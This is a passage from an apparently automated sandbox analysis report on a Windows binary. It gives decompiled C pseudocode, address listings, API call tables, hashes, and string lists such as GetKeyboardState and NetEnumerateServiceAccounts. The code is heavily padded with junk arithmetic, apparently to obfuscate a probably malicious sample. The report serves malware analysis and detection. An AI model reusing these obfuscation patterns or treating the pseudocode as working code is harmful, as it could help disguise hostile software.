                                                					} else {
                                                						_t84 = E004FEF2C; // 0xa1d900
                                                						 *0x4fef4c = _t84 + 4;
                                                					}
                                                				}
                                                				_t51 = E004FEF38; // 0xc3c34fdc
                                                				E004FEF10 = _t51;
                                                				_t52 = E004FEF10; // 0x1cb931c0
                                                				_push(_t52);
                                                				_t53 =  *0x4fef18; // 0xbc3e19a
                                                				_push(_t53);
                                                				_t54 =  *0x4fef48; // 0xc3c34ef0
                                                				_t101 =  *0x4feeec; // 0xb52124f2
                                                				 *0x4fef4c = E004F5954( *((intOrPtr*)(_t118 - 0x20)), _t99, _t101,  *((intOrPtr*)(_t118 - 0x20)), _t126);
                                                				_t111 = _t54;
                                                				 *[fs:eax] = _t111;
                                                				_push(E004F6591);
                                                				 *((intOrPtr*)(_t118 - 0x40)) =  *((intOrPtr*)(_t118 - 0x10));
                                                				if( *((intOrPtr*)(_t118 - 0x40)) != 0) {
                                                					 *((intOrPtr*)(_t118 - 0x40)) =  *((intOrPtr*)( *((intOrPtr*)(_t118 - 0x40)) - 4));
                                                				}
                                                				if( *((intOrPtr*)(_t118 - 0x40)) == 0x35) {
                                                					_t70 =  *0x4feea0; // 0xa1d900
                                                					 *0x4feea0 = E0040489C(_t70);
                                                					_t72 =  *0x4feee8; // 0xdcd0f434
                                                					 *0x4feedc = _t72 + 0x77;
                                                					_t74 =  *0x4feefc; // 0x4b08dcc7
                                                					 *0x4feef0 = _t74 + 4;
                                                				}
                                                				E004FEF10 =  *0x4feef4 * 0xd9;
                                                				 *0x4fef28 = 0x72 - E004FEF2C;
                                                				 *0x4fef04 = E004F356C(_t118 - 0x20, _t99, _t118 - 0x20, 0x4feef4, _t118 - 0x20);
                                                				 *0x4fef3c =  *0x4fef28 * 0xd6;
                                                				E00406CF4(_t118 - 0x1c,  *((intOrPtr*)(_t118 - 0x10)));
                                                				return CryptReleaseContext( *(_t118 - 0x24), 0);
                                                			}



































                                                0x004f6334
                                                0x004f6334
                                                0x004f633c
                                                0x004f6352
                                                0x004f6357
                                                0x004f6361
                                                0x004f636c
                                                0x004f6371
                                                0x004f63ab
                                                0x004f63ab
                                                0x004f63b5
                                                0x004f6373
                                                0x004f6373
                                                0x004f637e
                                                0x004f638a
                                                0x004f638c
                                                0x004f639a
                                                0x004f63a4
                                                0x004f638e
                                                0x004f638e
                                                0x004f6393
                                                0x004f6393
                                                0x004f638c
                                                0x004f63ba
                                                0x004f63bf
                                                0x004f63ca
                                                0x004f63cf
                                                0x004f63d4
                                                0x004f63d9
                                                0x004f63de
                                                0x004f63e4
                                                0x004f63e9
                                                0x004f63f3
                                                0x004f6402
                                                0x004f6407
                                                0x004f640c
                                                0x004f6411
                                                0x004f641c
                                                0x004f641c
                                                0x004f6421
                                                0x004f642c
                                                0x004f6431
                                                0x004f6436
                                                0x004f643d
                                                0x004f6447
                                                0x004f6447
                                                0x004f644e
                                                0x004f648b
                                                0x004f6490
                                                0x004f6490
                                                0x004f6493
                                                0x004f6496
                                                0x004f649e
                                                0x004f6450
                                                0x004f6450
                                                0x004f6455
                                                0x004f645a
                                                0x004f645f
                                                0x004f6465
                                                0x004f6484
                                                0x004f6467
                                                0x004f6467
                                                0x004f646f
                                                0x004f646f
                                                0x004f6465
                                                0x004f64a3
                                                0x004f64a8
                                                0x004f64ad
                                                0x004f64b2
                                                0x004f64b3
                                                0x004f64b8
                                                0x004f64b9
                                                0x004f64bf
                                                0x004f64d0
                                                0x004f64d7
                                                0x004f64da
                                                0x004f64dd
                                                0x004f64e5
                                                0x004f64ec
                                                0x004f64f6
                                                0x004f64f6
                                                0x004f64fd
                                                0x004f64ff
                                                0x004f6509
                                                0x004f650e
                                                0x004f6516
                                                0x004f651b
                                                0x004f6523
                                                0x004f6523
                                                0x004f6532
                                                0x004f6542
                                                0x004f655b
                                                0x004f656a
                                                0x004f6575
                                                0x004f6586

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID: 5$secur32.dll
                                                • API String ID: 0-2143472804
                                                • Opcode ID: 472484bea1d54e38275b9842fc81fac6e2b50d3f68021d3f75d40a37947cea4c
                                                • Instruction ID: 1fa50ebd78c81655f27541a69fb3294134e2ebe0b4fccc2a26a0502d3b5d8bb0
                                                • Opcode Fuzzy Hash: 472484bea1d54e38275b9842fc81fac6e2b50d3f68021d3f75d40a37947cea4c
                                                • Instruction Fuzzy Hash: 2E51E2B1910249AFDB00DF6AEC81A7977F5F748306B10853AE601D72B1D779A825CF2D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • IsValidLocale.KERNEL32(?,00000002,00000000,00408CA5,?,?,?,00000000), ref: 00778E3A
                                                • GetLocaleInfoW.KERNEL32(?,00000059,?,00000055,?,00000002,00000000,00408CA5,?,?,?,00000000), ref: 00778E56
                                                • GetLocaleInfoW.KERNEL32(00000000,0000005A,?,00000055,00000000,00000059,?,00000055,?,00000002,00000000,00408CA5,?,?,?,00000000), ref: 00778E67
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: Locale$Info$Valid
                                                • String ID:
                                                • API String ID: 1826331170-0
                                                • Opcode ID: cb507eff0a9ff0c664642af3a7362ca632920992a1cf376d5354f8749527c9d2
                                                • Instruction ID: 0aee79284cc080a155ca26f9207dd63531fea9d67cd250482ca563447bb261c8
                                                • Opcode Fuzzy Hash: cb507eff0a9ff0c664642af3a7362ca632920992a1cf376d5354f8749527c9d2
                                                • Instruction Fuzzy Hash: 6431E070A04A18EBDF24DB50DC49BAE77B9EB48340F1084A9A50CA3291DBB85E80CE25
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 71%
                                                			E00408B40(signed short __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
                                                				intOrPtr* _v8;
                                                				intOrPtr _v12;
                                                				short _v182;
                                                				short _v352;
                                                				char _v356;
                                                				char _v360;
                                                				char _v364;
                                                				int _t58;
                                                				signed int _t61;
                                                				intOrPtr _t70;
                                                				signed short _t80;
                                                				void* _t83;
                                                				void* _t85;
                                                				void* _t86;
                                                
                                                				_t77 = __edi;
                                                				_push(__edi);
                                                				_v356 = 0;
                                                				_v360 = 0;
                                                				_v364 = 0;
                                                				_v8 = __edx;
                                                				_t80 = __eax;
                                                				_push(_t83);
                                                				_push(0x408ca5);
                                                				_push( *[fs:eax]);
                                                				 *[fs:eax] = _t83 + 0xfffffe98;
                                                				E004069A8(_v8);
                                                				_t85 = _t80 -  *0x4fd9f0; // 0x404
                                                				if(_t85 >= 0) {
                                                					_t86 = _t80 -  *0x4fdbf0; // 0x7c68
                                                					if(_t86 <= 0) {
                                                						_t77 = 0x40;
                                                						_v12 = 0;
                                                						if(0x40 >= _v12) {
                                                							do {
                                                								_t61 = _t77 + _v12 >> 1;
                                                								if(_t80 >=  *((intOrPtr*)(0x4fd9f0 + _t61 * 8))) {
                                                									__eflags = _t80 -  *((intOrPtr*)(0x4fd9f0 + _t61 * 8));
                                                									if(__eflags <= 0) {
                                                										E00408A60( *((intOrPtr*)(0x4fd9f4 + _t61 * 8)), _t61, _v8, _t77, _t80, __eflags);
                                                									} else {
                                                										_v12 = _t61 + 1;
                                                										goto L8;
                                                									}
                                                								} else {
                                                									_t77 = _t61 - 1;
                                                									goto L8;
                                                								}
                                                								goto L9;
                                                								L8:
                                                							} while (_t77 >= _v12);
                                                						}
                                                					}
                                                				}
                                                				L9:
                                                				if( *_v8 == 0 && IsValidLocale(_t80 & 0x0000ffff, 2) != 0) {
                                                					_t58 = _t80 & 0x0000ffff;
                                                					GetLocaleInfoW(_t58, 0x59,  &_v182, 0x55);
                                                					GetLocaleInfoW(_t58, 0x5a,  &_v352, 0x55);
                                                					E004073C4( &_v356, 0x55,  &_v182);
                                                					_push(_v356);
                                                					_push(0x408cc0);
                                                					E004073C4( &_v360, 0x55,  &_v352);
                                                					_push(_v360);
                                                					_push(E00408CD0);
                                                					E004073C4( &_v364, 0x55,  &_v182);
                                                					_push(_v364);
                                                					E00407590(_v8, _t58, 5, _t77, _t80);
                                                				}
                                                				_pop(_t70);
                                                				 *[fs:eax] = _t70;
                                                				_push(E00408CAC);
                                                				return E00406A08( &_v364, 3);
                                                			}

















                                                0x00408b40
                                                0x00408b4b
                                                0x00408b4e
                                                0x00408b54
                                                0x00408b5a
                                                0x00408b60
                                                0x00408b63
                                                0x00408b67
                                                0x00408b68
                                                0x00408b6d
                                                0x00408b70
                                                0x00408b76
                                                0x00408b7b
                                                0x00408b82
                                                0x00408b84
                                                0x00408b8b
                                                0x00408b8d
                                                0x00408b94
                                                0x00408b9a
                                                0x00408b9c
                                                0x00408ba1
                                                0x00408bab
                                                0x00408bb2
                                                0x00408bba
                                                0x00408bcc
                                                0x00408bbc
                                                0x00408bbd
                                                0x00000000
                                                0x00408bbd
                                                0x00408bad
                                                0x00408baf
                                                0x00000000
                                                0x00408baf
                                                0x00000000
                                                0x00408bd3
                                                0x00408bd3
                                                0x00408b9c
                                                0x00408b9a
                                                0x00408b8b
                                                0x00408bd8
                                                0x00408bde
                                                0x00408c02
                                                0x00408c06
                                                0x00408c17
                                                0x00408c2d
                                                0x00408c32
                                                0x00408c38
                                                0x00408c4e
                                                0x00408c53
                                                0x00408c59
                                                0x00408c6f
                                                0x00408c74
                                                0x00408c82
                                                0x00408c82
                                                0x00408c89
                                                0x00408c8c
                                                0x00408c8f
                                                0x00408ca4

                                                APIs
                                                • IsValidLocale.KERNEL32(?,00000002,00000000,00408CA5,?,?,?,00000000), ref: 00408BEA
                                                • GetLocaleInfoW.KERNEL32(00000000,00000059,?,00000055,?,00000002,00000000,00408CA5,?,?,?,00000000), ref: 00408C06
                                                • GetLocaleInfoW.KERNEL32(00000000,0000005A,?,00000055,00000000,00000059,?,00000055,?,00000002,00000000,00408CA5,?,?,?,00000000), ref: 00408C17
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp Download File
                                                Similarity
                                                • API ID: Locale$Info$Valid
                                                • String ID:
                                                • API String ID: 1826331170-0
                                                • Opcode ID: 0a5065801f186bcbb4062cec21336acd3a9deb74b0e36497069608da79f47d51
                                                • Instruction ID: 57f6cea4338774ed362d2b227f4b3b0e2ac040428fbe23c68addde7683b7d737
                                                • Opcode Fuzzy Hash: 0a5065801f186bcbb4062cec21336acd3a9deb74b0e36497069608da79f47d51
                                                • Instruction Fuzzy Hash: 8031937090470CABEB109B51CE41BAF77B9EB44701F5001BFA548732D1EA786E50DB19
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • IsValidLocale.KERNEL32(?,00000002,00000000,00408CA5,?,?,?,00000000), ref: 00778E3A
                                                • GetLocaleInfoW.KERNEL32(?,00000059,?,00000055,?,00000002,00000000,00408CA5,?,?,?,00000000), ref: 00778E56
                                                • GetLocaleInfoW.KERNEL32(00000000,0000005A,?,00000055,00000000,00000059,?,00000055,?,00000002,00000000,00408CA5,?,?,?,00000000), ref: 00778E67
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: Locale$Info$Valid
                                                • String ID:
                                                • API String ID: 1826331170-0
                                                • Opcode ID: 254fb4cdb436c6b32ae713abdb8121408c128fdab0a2de7cf70e02032018e8e9
                                                • Instruction ID: 6aafb9f3626b9726af93b48a7403c19530bbd73a4f5b2c2c913c6b41e31185c8
                                                • Opcode Fuzzy Hash: 254fb4cdb436c6b32ae713abdb8121408c128fdab0a2de7cf70e02032018e8e9
                                                • Instruction Fuzzy Hash: FD21B331644A1CEAEF24DB50CC49BEF777AEB44341F1184A6A60C67182DB795E81CF61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 48%
                                                			E004F2F04() {
                                                				signed int _t25;
                                                				intOrPtr _t28;
                                                				signed int _t47;
                                                				signed int _t48;
                                                				intOrPtr _t49;
                                                				intOrPtr _t50;
                                                				intOrPtr _t51;
                                                				signed int _t52;
                                                				intOrPtr _t53;
                                                				intOrPtr _t56;
                                                				void* _t58;
                                                				void* _t62;
                                                
                                                				_pop(_t56);
                                                				 *[fs:eax] = _t56;
                                                				_push(E004F3000);
                                                				_t25 = E004FEF20; // 0x6e687a1a
                                                				 *0x4feea0 = _t25;
                                                				 *((intOrPtr*)(_t58 - 0x1c)) = 0x3c -  *((intOrPtr*)(_t58 - 0x34));
                                                				_t28 =  *0x4fef48; // 0xc3c34ef0
                                                				 *0x4feedc = _t28;
                                                				 *((intOrPtr*)(_t58 - 0x24)) = 0;
                                                				do {
                                                					 *((intOrPtr*)(_t58 - 0xb0)) =  *((intOrPtr*)(_t58 - 0x28)) + 0x3e;
                                                					asm("fild dword [ebp-0xb0]");
                                                					 *((intOrPtr*)(_t58 - 0x2c)) = E004048CC();
                                                					 *((intOrPtr*)(_t58 - 0x24)) =  *((intOrPtr*)(_t58 - 0x24)) + 1;
                                                				} while ( *((intOrPtr*)(_t58 - 0x24)) != 0xc);
                                                				 *(_t58 - 0x54) =  *(_t58 - 0x40) * 0x4e;
                                                				CryptReleaseContext( *(_t58 - 0x64), 0);
                                                				 *((intOrPtr*)(_t58 - 0x24)) =  *((intOrPtr*)(_t58 - 0x38)) +  *((intOrPtr*)(_t58 - 0x48));
                                                				 *((intOrPtr*)(_t58 - 0x28)) =  *((intOrPtr*)(_t58 - 0x58)) +  *((intOrPtr*)(_t58 - 0x34));
                                                				 *((intOrPtr*)(_t58 - 0x2c)) =  *(_t58 - 0x40) + 4;
                                                				 *(_t58 - 0x4c) =  *(_t58 - 0x50) * 0x5c;
                                                				 *0x4fef40 = 0xf6 -  *0x4fef30;
                                                				E00407640( *((intOrPtr*)(_t58 - 0x18)), L"api-ms-win-core-datetime-l1-1-0.dll");
                                                				if(0xf6 != 0) {
                                                					_t47 =  *0x4feed8; // 0x1cb9338e
                                                					E004FEF2C = _t47;
                                                					return _t47;
                                                				}
                                                				_t48 =  *0x4fef40; // 0x3c79b5d4
                                                				E004FEF50 = _t48;
                                                				_t49 =  *0x4fef30; // 0xa1d816
                                                				 *0x4feea0 = _t49;
                                                				_t50 =  *0x4feea0; // 0xa1d900
                                                				_t62 = _t50 - E004FEF50; // 0xa3b3f6c0
                                                				if(_t62 <= 0) {
                                                					_t51 =  *0x4feed8; // 0x1cb9338e
                                                					_t52 = _t51 + E004FEF00;
                                                					E004FEF10 = _t52;
                                                					return _t52;
                                                				}
                                                				_t53 =  *0x4feea0; // 0xa1d900
                                                				 *0x4feedc = _t53;
                                                				return _t53;
                                                			}















                                                0x004f2f06
                                                0x004f2f09
                                                0x004f2f0c
                                                0x004f2f11
                                                0x004f2f16
                                                0x004f2f23
                                                0x004f2f26
                                                0x004f2f2b
                                                0x004f2f32
                                                0x004f2f35
                                                0x004f2f3b
                                                0x004f2f41
                                                0x004f2f4c
                                                0x004f2f4f
                                                0x004f2f52
                                                0x004f2f5c
                                                0x004f2f65
                                                0x004f2f71
                                                0x004f2f7a
                                                0x004f2f83
                                                0x004f2f8a
                                                0x004f2f98
                                                0x004f2fa5
                                                0x004f2faa
                                                0x004f2feb
                                                0x004f2ff0
                                                0x00000000
                                                0x004f2ff0
                                                0x004f2fac
                                                0x004f2fb1
                                                0x004f2fb6
                                                0x004f2fbb
                                                0x004f2fc0
                                                0x004f2fc5
                                                0x004f2fcb
                                                0x004f2fd9
                                                0x004f2fde
                                                0x004f2fe4
                                                0x00000000
                                                0x004f2fe4
                                                0x004f2fcd
                                                0x004f2fd2
                                                0x00000000

                                                APIs
                                                • CryptReleaseContext.ADVAPI32(?,00000000,004F3000,00000000,004F31F8,?,?,?,?,?,004F8F6A,00000254,?,00000002,004FEEFC,?), ref: 004F2F65
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp Download File
                                                Similarity
                                                • API ID: ContextCryptRelease
                                                • String ID: /$CNB_0309.DLL$CNB_0317.DLL$GetKeyboardState$Microsoft.WSMan.Management.ni.dll$NetEnumerateServiceAccounts$System.Runtime.Remoting.dll$WcnEapPeerProxy.dll$WininetPlugin.dll$api-ms-win-core-datetime-l1-1-0.dll$api-ms-win-core-util-l1-1-0.dll$davclnt.dll$dmintf.dll$dxmasf.dll$mqcertui.dll$repdrvfs.dll$rtm.dll
                                                • API String ID: 829835001-681767285
                                                • Opcode ID: aaf08c82e729d934e3c98f607922efa0e883fd82d4dab3948184c63bdc248ed8
                                                • Instruction ID: ac5c7f6908e7f505b2d289c34299d38038ef80d476a0134258c818c5288e1994
                                                • Opcode Fuzzy Hash: aaf08c82e729d934e3c98f607922efa0e883fd82d4dab3948184c63bdc248ed8
                                                • Instruction Fuzzy Hash: DB21BEB5D10209DFCB10CFAAE981AADBBF2FB08305F10446AE504E7324D375A911DF29
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetUserDefaultUILanguage.KERNEL32(00000003,?,00000004,00000000,00409760,?,?), ref: 00779922
                                                • GetLocaleInfoW.KERNEL32(?,00000003,?,00000004,00000000,00409760,?,?), ref: 0077992B
                                                  • Part of subcall function 007797B8: FindFirstFileW.KERNEL32(00000000,?,00000000,004095C6,?,00000001), ref: 007797EB
                                                  • Part of subcall function 007797B8: FindClose.KERNEL32(00000000,00000000,?,00000000,004095C6,?,00000001), ref: 007797FB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                                                • String ID:
                                                • API String ID: 3216391948-0
                                                • Opcode ID: a1fd86469c6c623815e633a765fbef797d4bae3073c51c098040b7934b117338
                                                • Instruction ID: 5c4344ab51303013cf1be69b2a75b2977a6224a569e5180003d9fadfefa10485
                                                • Opcode Fuzzy Hash: a1fd86469c6c623815e633a765fbef797d4bae3073c51c098040b7934b117338
                                                • Instruction Fuzzy Hash: 1E118470A04249DBDF04FFA4C986AEDB3B8EF45340F508479B518E7296DB386E04CB65
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • FindFirstFileW.KERNEL32(00000000,?,00000000,004095C6,?,00000001), ref: 007797EB
                                                • FindClose.KERNEL32(00000000,00000000,?,00000000,004095C6,?,00000001), ref: 007797FB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: Find$CloseFileFirst
                                                • String ID:
                                                • API String ID: 2295610775-0
                                                • Opcode ID: 1911b16eb98d6be23cba1a234f18235c159e94818ccd5451e9cb65e612604cdb
                                                • Instruction ID: 02ab21ef21f13bc1b1a0754725e8a6182722713a0542c3a34f6fef4b117b9681
                                                • Opcode Fuzzy Hash: 1911b16eb98d6be23cba1a234f18235c159e94818ccd5451e9cb65e612604cdb
                                                • Instruction Fuzzy Hash: 96F0E2B1500604EFCF21FBB8CC0699DB3FCEB09350BA445B1B418E2192EB38AF109914
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00414924(void* __eax) {
                                                				struct _WIN32_FIND_DATAW _v596;
                                                				void* _t11;
                                                
                                                				_t11 = FindFirstFileW(E00407330(__eax),  &_v596);
                                                				if(_t11 == 0xffffffff) {
                                                					return 0;
                                                				}
                                                				return FindClose(_t11) & 0xffffff00 | (_v596.dwFileAttributes & 0x00000010) == 0x00000000;
                                                			}





                                                0x0041493f
                                                0x00414947
                                                0x00000000
                                                0x0041495b
                                                0x00000000

                                                APIs
                                                • FindFirstFileW.KERNEL32(00000000,?,00000000,?,004149EB,00000000,?,?,00000000,004F68DB,00000000,004F6D12), ref: 0041493F
                                                • FindClose.KERNEL32(00000000,00000000,?,00000000,?,004149EB,00000000,?,?,00000000,004F68DB,00000000,004F6D12), ref: 0041494A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp Download File
                                                Similarity
                                                • API ID: Find$CloseFileFirst
                                                • String ID:
                                                • API String ID: 2295610775-0
                                                • Opcode ID: 0a26af79ca2f6d1537337b881b73c1f89f7919ffecbb5ca7a791117caaba7855
                                                • Instruction ID: 1a1146ce06fd08cae000a50341769f21309330914b557231780e0040e5fa1e32
                                                • Opcode Fuzzy Hash: 0a26af79ca2f6d1537337b881b73c1f89f7919ffecbb5ca7a791117caaba7855
                                                • Instruction Fuzzy Hash: E8E0CD7291420812C71055FA4CC97EB77CC5B44328F140BB77E2CE22D2E73C995100DD
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 96%
                                                			E004F2D48(void* __eflags) {
                                                				signed int _t77;
                                                				signed int _t84;
                                                				signed int _t85;
                                                				signed int _t87;
                                                				intOrPtr _t89;
                                                				intOrPtr _t102;
                                                				signed int _t103;
                                                				intOrPtr _t104;
                                                				signed int _t106;
                                                				signed int _t110;
                                                				signed int _t114;
                                                				signed int _t118;
                                                				signed int _t119;
                                                				intOrPtr _t127;
                                                				void* _t135;
                                                				void* _t138;
                                                				void* _t141;
                                                
                                                				 *(_t135 - 0x34) =  *((intOrPtr*)(_t135 - 0x20)) + 0x76;
                                                				 *(_t135 - 0x38) =  *((intOrPtr*)(_t135 - 0x48)) +  *((intOrPtr*)(_t135 - 0x58));
                                                				 *(_t135 - 0x3c) =  *(_t135 - 0x28) * 0x7b;
                                                				 *(_t135 - 0x1c) =  *(_t135 - 0x40) * 0xf5;
                                                				 *(_t135 - 0x4c) =  *((intOrPtr*)(_t135 - 0x30)) + 0xea;
                                                				_t77 = E004FEF2C; // 0xa1d900
                                                				 *0x4feea0 = _t77 + E004FEED0;
                                                				_pop(_t127);
                                                				 *[fs:eax] = _t127;
                                                				_push(E004F2F04);
                                                				 *(_t135 - 0x34) =  *(_t135 - 0x44) *  *(_t135 - 0x28);
                                                				 *(_t135 - 0x38) =  *(_t135 - 0x2c) +  *(_t135 - 0x2c) * 4;
                                                				_t84 = E004FEF38; // 0xc3c34fdc
                                                				 *0x4fef18 = _t84;
                                                				_t85 = E004FEF20; // 0x6e687a1a
                                                				E004FEF20 = E0040489C(_t85);
                                                				_t87 = E004FEF2C; // 0xa1d900
                                                				if(_t87 -  *0x4fef4c >= 0x3d) {
                                                					_t89 =  *0x4fef44; // 0x38993
                                                					__eflags = _t89 + E004FEF34 - E004FEF34; // 0xc3c34ef0
                                                					if(__eflags == 0) {
                                                						 *((intOrPtr*)(_t135 - 0x50)) = 0;
                                                						__eflags =  *((intOrPtr*)(_t135 - 0x50)) - 0xc;
                                                						while( *((intOrPtr*)(_t135 - 0x50)) < 0xc) {
                                                							 *((intOrPtr*)(_t135 - 0x50)) =  *((intOrPtr*)(_t135 - 0x50)) + 1;
                                                							E00406CF4(_t135 - 0x14,  *((intOrPtr*)(_t135 - 0x14)));
                                                							__eflags =  *((intOrPtr*)(_t135 - 0x50)) - 0xc;
                                                						}
                                                					}
                                                				} else {
                                                					_t118 = E004FEF34; // 0xc3c34ef0
                                                					E004FEF34 = _t118;
                                                					_t119 = E004FEF34; // 0xc3c34ef0
                                                					_t138 = _t119 - E004FEF20; // 0x6e687a1a
                                                					if(_t138 >= 0) {
                                                						 *(_t135 - 0x24) =  *(_t135 - 0x3c) - 0x8a;
                                                					} else {
                                                						 *(_t135 - 0x1c) = 0;
                                                						_t139 =  *(_t135 - 0x1c) - 0xe;
                                                						while( *(_t135 - 0x1c) < 0xe) {
                                                							 *(_t135 - 0x1c) =  *(_t135 - 0x1c) + 1;
                                                							 *0x4fef48 = E004F0EBC(_t135 - 0x40,  &E004FEF2C, _t139);
                                                							_t140 =  *(_t135 - 0x1c) - 0xe;
                                                						}
                                                					}
                                                				}
                                                				 *((intOrPtr*)(_t135 - 0x48)) =  *(_t135 - 0x40) + 0x7a;
                                                				CryptDestroyKey( *(_t135 - 0x68));
                                                				E00406CF4(_t135 - 0x14,  *((intOrPtr*)(_t135 - 0x14)));
                                                				E004F0EBC(_t135 - 0x3c, _t135 - 0x40, _t140);
                                                				 *(_t135 - 0x24) =  *(_t135 - 0x4c) * 0xe9;
                                                				 *(_t135 - 0x28) =  *(_t135 - 0x38) *  *(_t135 - 0x40);
                                                				_t102 =  *0x4fef4c; // 0x43c1493c
                                                				 *0x4feef0 = _t102;
                                                				_t103 = E004FEF38; // 0xc3c34fdc
                                                				 *0x4feef4 = _t103;
                                                				_t104 =  *0x4feef0; // 0x44632301
                                                				_t141 = _t104 -  *0x4feef4; // 0xb52124ca
                                                				if(_t141 <= 0) {
                                                					_t106 =  *((intOrPtr*)(_t135 - 0x48)) + 0xb7;
                                                					__eflags = _t106;
                                                					 *(_t135 - 0x34) = _t106;
                                                				} else {
                                                					_t114 =  *0x4feed8; // 0x1cb9338e
                                                					E004FEF0C = _t114;
                                                				}
                                                				if( *(_t135 - 0x4c) -  *((intOrPtr*)(_t135 - 0x48)) >= 0xb7) {
                                                					_t110 =  *(_t135 - 0x3c) +  *(_t135 - 0x1c);
                                                					__eflags = _t110;
                                                					 *(_t135 - 0x2c) = _t110;
                                                					return _t110;
                                                				}
                                                				 *((intOrPtr*)(_t135 - 0x50)) = 0;
                                                				if( *((intOrPtr*)(_t135 - 0x50)) < 0xe) {
                                                					 *((intOrPtr*)(_t135 - 0x50)) =  *((intOrPtr*)(_t135 - 0x50)) + 1;
                                                					return E00406CF4(_t135 - 0x14,  *((intOrPtr*)(_t135 - 0x14)));
                                                				}
                                                				return 0;
                                                			}




















                                                0x004f2d4e
                                                0x004f2d57
                                                0x004f2d5e
                                                0x004f2d68
                                                0x004f2d73
                                                0x004f2d76
                                                0x004f2d81
                                                0x004f2d88
                                                0x004f2d8b
                                                0x004f2d8e
                                                0x004f2d99
                                                0x004f2da2
                                                0x004f2da5
                                                0x004f2daa
                                                0x004f2daf
                                                0x004f2db9
                                                0x004f2dbe
                                                0x004f2dcc
                                                0x004f2e1a
                                                0x004f2e25
                                                0x004f2e2b
                                                0x004f2e2f
                                                0x004f2e32
                                                0x004f2e36
                                                0x004f2e38
                                                0x004f2e41
                                                0x004f2e46
                                                0x004f2e46
                                                0x004f2e36
                                                0x004f2dce
                                                0x004f2dce
                                                0x004f2dd3
                                                0x004f2dd8
                                                0x004f2ddd
                                                0x004f2de3
                                                0x004f2e15
                                                0x004f2de5
                                                0x004f2de7
                                                0x004f2dea
                                                0x004f2dee
                                                0x004f2df0
                                                0x004f2e00
                                                0x004f2e05
                                                0x004f2e05
                                                0x004f2dee
                                                0x004f2de3
                                                0x004f2e52
                                                0x004f2e59
                                                0x004f2e65
                                                0x004f2e70
                                                0x004f2e7c
                                                0x004f2e85
                                                0x004f2e88
                                                0x004f2e8d
                                                0x004f2e92
                                                0x004f2e97
                                                0x004f2e9c
                                                0x004f2ea1
                                                0x004f2ea7
                                                0x004f2eb8
                                                0x004f2eb8
                                                0x004f2ebd
                                                0x004f2ea9
                                                0x004f2ea9
                                                0x004f2eae
                                                0x004f2eae
                                                0x004f2ecb
                                                0x004f2ef3
                                                0x004f2ef3
                                                0x004f2ef6
                                                0x00000000
                                                0x004f2ef6
                                                0x004f2ecf
                                                0x004f2ed6
                                                0x004f2ed8
                                                0x00000000
                                                0x004f2ee1
                                                0x004f2ef9

                                                APIs
                                                • CryptDestroyKey.ADVAPI32(?,00000004,004F2F04,?,00000254,00000000,004F31F8,?,?,?,?,?,004F8F6A,00000254,?,00000002), ref: 004F2E59
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp Download File
                                                Similarity
                                                • API ID: CryptDestroy
                                                • String ID: /$CNB_0309.DLL$CNB_0317.DLL$GetKeyboardState$Microsoft.WSMan.Management.ni.dll$NetEnumerateServiceAccounts$System.Runtime.Remoting.dll$WcnEapPeerProxy.dll$WininetPlugin.dll$api-ms-win-core-datetime-l1-1-0.dll$api-ms-win-core-util-l1-1-0.dll$davclnt.dll$dmintf.dll$dxmasf.dll$mqcertui.dll$repdrvfs.dll$rtm.dll
                                                • API String ID: 1712904745-681767285
                                                • Opcode ID: 372445189b85d796ec6a3c8eeef791485d6cbf82940575c63a31ef800605fd9c
                                                • Instruction ID: a4c5ec0d69701be20dce32833e06628e660468b9fbe6c074615e5140626a8fc5
                                                • Opcode Fuzzy Hash: 372445189b85d796ec6a3c8eeef791485d6cbf82940575c63a31ef800605fd9c
